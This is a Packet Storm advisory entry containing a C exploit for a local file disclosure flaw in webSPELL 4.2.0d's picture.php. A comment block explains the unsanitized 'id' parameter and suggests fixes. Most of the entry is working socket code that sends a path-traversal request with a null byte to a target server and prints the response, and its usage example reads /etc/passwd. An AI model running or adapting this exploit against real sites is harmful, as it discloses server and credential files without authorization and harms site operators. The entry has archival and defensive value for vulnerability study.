webSPELL 4.2.0d Local File Disclosure

2009-04-28T00:00:00
ID PACKETSTORM:77077
Type packetstorm
Reporter StAkeR
Modified 2009-04-28T00:00:00

Description

                                        
                                            `/*   
* webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)   
*  
* by Juri Gianni aka yeat - staker[at]hotmail[dot]it  
*  
* Description  
* -----------  
* webSPELL contains one flaw that allows an attacker  
* to disclose a local file. The issue is due to 'picture.php'  
* script not properly sanitizing user input supplied to  
* the 'file' GET variable.  
* -----------  
* Vulnerability already found by Trex on 4.01.02 version.  
* Not Fixed. it works with magic_quotes_gpc OFF  
* Visit http://zeroidentity.org  
*   
* Download on http://www.webspell.org/download.php?fileID=22  
*  
* (File: picture.php) code details  
* --------------------------------  
  
if(file_exists('images/gallery/large/'.$_GET['id'].'.jpg'))   
$file='images/gallery/large/'.$_GET['id'].'.jpg';  
  
elseif(file_exists('images/gallery/large/'.$_GET['id'].'.gif'))   
$file='images/gallery/large/'.$_GET['id'].'.gif';  
  
elseif(file_exists('images/gallery/large/'.$_GET['id'].'.png'))  
$file='images/gallery/large/'.$_GET['id'].'.png';  
  
else $file='';  
  
$info=getimagesize($file);  
  
switch($info[2]) {  
case 1: Header("Content-type: image/gif"); break;  
case 2: Header("Content-type: image/jpeg"); break;  
case 3: Header("Content-type: image/png"); break;  
}  
  
echo file_get_contents($file);  
?>  
  
* ------------------------------   
* Possible Fix:  
*   
* $file = preg_replace('/[^a-zA-Z0-9\_]/','',addslashes($_GET['id']));  
*   
* otherwise if $_GET['id'] variable is an integer use intval() function.  
*   
* $file = intval($_GET['id']);  
*   
* -----------------------------  
*/  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <netdb.h>  
  
  
#define GET "GET %s/picture.php?id=%s HTTP/1.1\r\n" \  
"Host: %s\r\n" \  
"User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \  
"Connection: close\r\n\r\n"  
  
  
  
char *getHost (char *host)  
{   
struct hostent *hp;  
struct in_addr **y;  
  
hp = gethostbyname(host);  
y = (struct in_addr **)hp->h_addr_list;  
  
return inet_ntoa(**y);  
}  
  
  
int main (int argc,char **argv)  
{  
int server,leak;  
char data[1024],html[5000];  
char packet[500],loadsf[5000];  
  
struct sockaddr_in addr;  
  
if (argc < 3) {  
printf("Usage: %s host /path file\n",argv[0]);  
printf("RunEx: %s localhost /webSPELL ../../../../../etc/passwd\n",argv[0]);  
exit(0);  
}   
  
server = socket(AF_INET,SOCK_STREAM,0);  
  
addr.sin_family = AF_INET;  
addr.sin_port = htons((int)80);  
addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));  
  
leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));  
  
if (leak < 0) {  
printf("connection refused..try again\n");  
exit(0);  
}   
  
strncat(argv[3],"%00",sizeof(argv[3]));  
snprintf(packet,sizeof(packet),GET,argv[2],argv[3],argv[1]);   
  
if (send(server,packet,sizeof(packet),0) < 0) {  
printf("data sent error..\n");  
}   
  
while(recv(server,html,sizeof(html),0) > 0) {   
printf("%s",html);   
}   
  
return 0;  
}  
  
  
`